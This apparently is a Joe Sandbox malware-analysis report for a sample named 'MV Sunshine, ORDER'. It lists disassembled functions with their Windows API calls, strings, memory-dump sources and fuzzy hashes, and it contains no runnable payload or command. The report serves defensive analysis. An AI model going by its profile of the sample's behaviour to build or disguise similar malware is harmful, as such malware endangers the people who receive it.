Instruction ID: ab50b6680724cefd84371bf5765190ac2bf9384958604570d6482f0eb501834c
Opcode Fuzzy Hash: c86c3e18cb56c182eadc7bb0539c386bb934e63013842ccc47117b2b7444b37b
Instruction Fuzzy Hash: B96196B490028DAFDB22CF95CC84EBE7BBCFB46304F240599E841A7251D771AD46DB21

Function 00A07192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A07214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A07217
GetWindowLongW.USER32(?,000000F0), ref: 00A0723B
_memset.LIBCMT ref: 00A0724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A0725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A072D6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 766a1f262efd2814a4b68e8026bb56f750340a7439a632e4dd5095fd3fad129f
Instruction ID: a134d5a4dd0f7fe94145d31018d9e462bca0f91b0a052696a703e398ebff3581
Opcode Fuzzy Hash: 766a1f262efd2814a4b68e8026bb56f750340a7439a632e4dd5095fd3fad129f
Instruction Fuzzy Hash: D5617B75900208AFDB20DFA4DC81EEE77F8EB49710F140159FA15AB2E1D771AD42DBA1

Function 009D710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009D7135
SafeArrayAllocData.OLEAUT32(?), ref: 009D718E
VariantInit.OLEAUT32(?), ref: 009D71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 009D71C0
VariantCopy.OLEAUT32(?,?), ref: 009D7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 009D7227
VariantClear.OLEAUT32(?), ref: 009D723C
SafeArrayDestroyData.OLEAUT32(?), ref: 009D7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D7252
VariantClear.OLEAUT32(?), ref: 009D7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D726F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 832cd88d2d7b2b1a2f2e2a5500396d16e3783cc8fe3a73faccfc26e78f76ae1e
Instruction ID: abaec7cd3b33e00806f3d48be23c6a942ba13d55d81e163458920014888bef1e
Opcode Fuzzy Hash: 832cd88d2d7b2b1a2f2e2a5500396d16e3783cc8fe3a73faccfc26e78f76ae1e
Instruction Fuzzy Hash: 7341513594421DAFCF10DFA4D884AAEBBB8FF48354F00C06AF955A7761DB31A946CB90

Function 009F5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009F5AA6
inet_addr.WSOCK32(?,?,?), ref: 009F5AEB
gethostbyname.WSOCK32(?), ref: 009F5AF7
IcmpCreateFile.IPHLPAPI ref: 009F5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 009F5C00
WSACleanup.WSOCK32 ref: 009F5C06

Strings

Ping, xrefs: 009F5B29

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 7caa06bc6f7fade9e8d1b4e3378068c92ae769b664e6673339e32f4748a18b5a
Instruction ID: 3b4cdacc37e02512dd7701310385c4c527235a1893a22e6115d9c95170cb49cb
Opcode Fuzzy Hash: 7caa06bc6f7fade9e8d1b4e3378068c92ae769b664e6673339e32f4748a18b5a
Instruction Fuzzy Hash: 835181316047049FD720EF64DC49B3AB7E4EF84710F15892AF696EB2A1DB70E801CB42

Function 009EB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009EB7B1
GetLastError.KERNEL32 ref: 009EB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 009EB828

Strings

READY, xrefs: 009EB801
INVALID, xrefs: 009EB7FA
UNKNOWN, xrefs: 009EB7E0
NOTREADY, xrefs: 009EB7E7
READONLY, xrefs: 009EB7F3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 885ac090ed4e9c9aeeb96e45b602cf13f531c1310c1cdb293266b24e22620aa8
Instruction ID: 137586aa7f21a5254bd6a9ec80e22fcc6ea587b75463455e1ff0cb06636a2d7b
Opcode Fuzzy Hash: 885ac090ed4e9c9aeeb96e45b602cf13f531c1310c1cdb293266b24e22620aa8
Instruction Fuzzy Hash: FC317435A00249AFDB11EFA5C885ABFB7B8FF98700F144429F501D7691DB729D42CB51

Function 009D9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009D94F6
GetDlgCtrlID.USER32 ref: 009D9501
GetParent.USER32 ref: 009D951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9520
GetDlgCtrlID.USER32(?), ref: 009D9529
GetParent.USER32(?), ref: 009D9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9548

Strings

ListBox, xrefs: 009D94B3
ComboBox, xrefs: 009D947E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: bb6d40a0273da69ab581b7928e2db0182fb4ef89c238fde45db6ad7402699821
Instruction ID: 0d7891049653c7e4ccadfc8b5ef51818df84c461aaa1b4c710acdc2a878adf1d
Opcode Fuzzy Hash: bb6d40a0273da69ab581b7928e2db0182fb4ef89c238fde45db6ad7402699821
Instruction Fuzzy Hash: 0021B274940108BFCF05EFA5CC85EFEBB68EF95310F104226B961973A2DB75991A9B20

Function 009D955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009D95DF
GetDlgCtrlID.USER32 ref: 009D95EA
GetParent.USER32 ref: 009D9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9609
GetDlgCtrlID.USER32(?), ref: 009D9612
GetParent.USER32(?), ref: 009D962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9631

Strings

ListBox, xrefs: 009D959E
ComboBox, xrefs: 009D9569

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 59f03d4d7fb05c071933662d99528e0127171f76f48fa672c0c95ca95164005b
Instruction ID: 07ef0c7d776c203deb1189cf52e378f8722dc0a67285f10c3a10dfd75cd70349
Opcode Fuzzy Hash: 59f03d4d7fb05c071933662d99528e0127171f76f48fa672c0c95ca95164005b
Instruction Fuzzy Hash: E321B374940208BFDF15EBA1CCC5EFEBBB8EF48300F504116B911A72A1DB75991A9B20

Function 009D9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009D9651
GetClassNameW.USER32(00000000,?,00000100), ref: 009D9666
_wcscmp.LIBCMT ref: 009D9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009D96F3

Strings

SHELLDLL_DefView, xrefs: 009D9672
largeicons, xrefs: 009D9687
smallicons, xrefs: 009D96BB
list, xrefs: 009D96D5
details, xrefs: 009D96A1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c6ea0998a4359ce6d1601625f7a3e35fe53e85598bf2a47d0941ffebef6a157f
Instruction ID: 0fe364a8c22e30d981ff990f5b4d1e80636afebf93f3572b03504617e9986e1e
Opcode Fuzzy Hash: c6ea0998a4359ce6d1601625f7a3e35fe53e85598bf2a47d0941ffebef6a157f
Instruction Fuzzy Hash: C811E97728C307BAFA113620DC07EA7779C9B06760F208527F900A55E1FEA2E9564B98

Function 009F8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009F8BEC
CoInitialize.OLE32(00000000), ref: 009F8C19
CoUninitialize.OLE32 ref: 009F8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 009F8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 009F8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A12C0C), ref: 009F8E84
CoGetObject.OLE32(?,00000000,00A12C0C,?), ref: 009F8EA7
SetErrorMode.KERNEL32(00000000), ref: 009F8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009F8F3A
VariantClear.OLEAUT32(?), ref: 009F8F4A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: c7d74d171e08ebabeabb0f10e58eb4e29afe0c473ca677183e182b8de315530b
Instruction ID: 3c36780df534fcb871dca1ba3f04835fd7be42099fedabacf3b41bbcf9b6316a
Opcode Fuzzy Hash: c7d74d171e08ebabeabb0f10e58eb4e29afe0c473ca677183e182b8de315530b
Instruction Fuzzy Hash: 7AC13471208309AFD740EF64C884A6BB7E9FF89348F00492DF6899B251DB31ED06CB52

Function 009E4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 009E419D
__swprintf.LIBCMT ref: 009E41AA

Part of subcall function 009A38D8: __woutput_l.LIBCMT ref: 009A3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 009E41D4
LoadResource.KERNEL32(?,00000000), ref: 009E41E0
LockResource.KERNEL32(00000000), ref: 009E41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 009E420D
LoadResource.KERNEL32(?,00000000), ref: 009E421F
SizeofResource.KERNEL32(?,00000000), ref: 009E422E
LockResource.KERNEL32(?), ref: 009E423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009E429B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: f6f057c82a177169609f16232e89dede760227b3671209a354fe5472a63c16ff
Instruction ID: 90fed6f70bc1a4e1bc06a3c0630435917115f39b030341dd629678b0e4198c15
Opcode Fuzzy Hash: f6f057c82a177169609f16232e89dede760227b3671209a354fe5472a63c16ff
Instruction Fuzzy Hash: 4331B075A0529AAFCB12DFA1DC48EBF7BACEF09301F004525F911E6250D734DE528BA1

Function 009E16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009E1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E1714
GetWindowThreadProcessId.USER32(00000000), ref: 009E171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 009E173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0778,?,00000001), ref: 009E1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0778,?,00000001), ref: 009E17CC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: eda51dd2b49764128de40efd77a9f742b16c4044b6273b79fe3a37d52672c87e
Instruction ID: 6489dc1500652e153ad7c18d341d14ec207167780024dcacbec38c840323688d
Opcode Fuzzy Hash: eda51dd2b49764128de40efd77a9f742b16c4044b6273b79fe3a37d52672c87e
Instruction Fuzzy Hash: 5D31B179600288BFDB22DF95DC84B7977EDAB5AB51F104014F804D62A0DB769D46CB50

Function 0098FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0098FC06
OleUninitialize.OLE32(?,00000000), ref: 0098FCA5
UnregisterHotKey.USER32(?), ref: 0098FDFC
DestroyWindow.USER32(?), ref: 009C4A00
FreeLibrary.KERNEL32(?), ref: 009C4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C4A92

Strings

close all, xrefs: 0098FC01

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 83f9ee58dcccea141bab770f2ab08c5cd3e720b66ab94b32dd5e01047d7c6f76
Instruction ID: 892b91ea296a4ee2fd4b85d7770ee3ed386a2746872e7261b561cf30e2d47118
Opcode Fuzzy Hash: 83f9ee58dcccea141bab770f2ab08c5cd3e720b66ab94b32dd5e01047d7c6f76
Instruction Fuzzy Hash: 11A17D34B012128FCB29EF54C4A5F69F768AF44700F5542ADE90AAB362DB30ED16CF95

Function 009DA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,009DAA64), ref: 009DA9A2

Strings

CLASS, xrefs: 009DA721
TEXT, xrefs: 009DA8D9
REGEXPCLASS, xrefs: 009DA767
NAME, xrefs: 009DA7D4
INSTANCE, xrefs: 009DA8B0
CLASSNN, xrefs: 009DA744

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: fc1ccc1356516dfd33a55c4321966e0afe1386ed1e7c9427dd3d45bb2422bdf0
Instruction ID: eec84daeeb9b06a24c10015ebf3236b1d67634d73f55ddfdb0b3583728b6c7f7
Opcode Fuzzy Hash: fc1ccc1356516dfd33a55c4321966e0afe1386ed1e7c9427dd3d45bb2422bdf0
Instruction Fuzzy Hash: 2B91C871A00606EBDB08DF70C491BE9FB79BF54304F50C11AE899A7391DF30AA69CB91

Function 00982E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00982EAE

Part of subcall function 00981DB3: GetClientRect.USER32(?,?), ref: 00981DDC
Part of subcall function 00981DB3: GetWindowRect.USER32(?,?), ref: 00981E1D
Part of subcall function 00981DB3: ScreenToClient.USER32(?,?), ref: 00981E45

GetDC.USER32 ref: 009BCF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009BCF95
SelectObject.GDI32(00000000,00000000), ref: 009BCFA3
SelectObject.GDI32(00000000,00000000), ref: 009BCFB8
ReleaseDC.USER32(?,00000000), ref: 009BCFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009BD04B

Strings

U, xrefs: 009BCF20

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 73caa19e562e733180a7d496eb4431886fafc5d986339bb17ca09aaa28d43dd2
Instruction ID: 1b5f740afa6bdb12e1c85a8ce9083086052e65c904f31cdbe0bb9f2bf3f4c59e
Opcode Fuzzy Hash: 73caa19e562e733180a7d496eb4431886fafc5d986339bb17ca09aaa28d43dd2
Instruction Fuzzy Hash: B7710570400209DFCF21EF64C984AFA7BBAFF49360F1442AAED555A2A6D7318C42DB60

Function 00A0C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
Part of subcall function 00982344: ScreenToClient.USER32(00A467B0,?), ref: 00982374
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A0C2E4
ImageList_EndDrag.COMCTL32 ref: 00A0C2EA
ReleaseCapture.USER32 ref: 00A0C2F0
SetWindowTextW.USER32(?,00000000), ref: 00A0C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A0C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A0C48F

Strings

@GUI_DRAGFILE, xrefs: 00A0C424
@GUI_DROPID, xrefs: 00A0C3E1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: f985f9926a77fa4eaaf59a3e15f3e55cfe6c5b10aa79b78b5b2181f30d3a2ef7
Instruction ID: 3cdf1e064d68eb123e153d3d0b0b65515abdd34c11f47e7c9f558b789c469b2f
Opcode Fuzzy Hash: f985f9926a77fa4eaaf59a3e15f3e55cfe6c5b10aa79b78b5b2181f30d3a2ef7
Instruction Fuzzy Hash: BB51AD78204308AFD714EF60D895F6A7BE1FBC9310F004A2DF5919B2E1DB71A945CB52

Function 009F8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A0F910), ref: 009F903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A0F910), ref: 009F9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009F91EB
SysFreeString.OLEAUT32(?), ref: 009F9215

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
